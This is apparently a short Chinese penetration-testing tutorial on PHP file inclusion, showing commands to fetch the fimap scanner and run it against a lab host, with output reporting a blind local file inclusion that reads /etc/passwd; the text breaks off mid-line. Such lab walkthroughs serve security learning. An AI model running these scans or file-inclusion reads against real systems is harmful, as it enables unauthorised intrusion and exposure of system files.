PHP文件包含漏洞 2 fimap
宇文峰
root@Ubuntu:/pen/web# svn checkout http://fimap.googlecode.com/svn/trunk/ fimap扫描一下:
root@Ubuntu:/pen/web# cd fimap/src/
root@Ubuntu:/pen/web/fimap/src# ./fimap.py -u "http://5.5.5.3/lif.php?file=info.php" --enable-blind
fimap v.1.00_svn (Uitmuntende programmatuur alleen voor jij!)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)
Blind FI-error checking enabled.
SingleScan is testing URL: 'http://5.5.5.3/lif.php?file=info.php'
[07:07:59] [OUT] Inspecting URL 'http://5.5.5.3/lif.php?file=info.php'...
[07:07:59] [INFO] Fiddling around with URL...
[07:07:59] [INFO] Sniper failed. Going blind...
[07:07:59] [OUT] Possible file inclusion found blindly! -> 'http://5.5.5.3/lif.php?file=/etc/passwd' with Parameter 'file'.
[07:07:59] [OUT] Identifying Vulnerability 'http://5.5.5.3/lif.php?file=info.php' with Parameter 'fi
类似资料: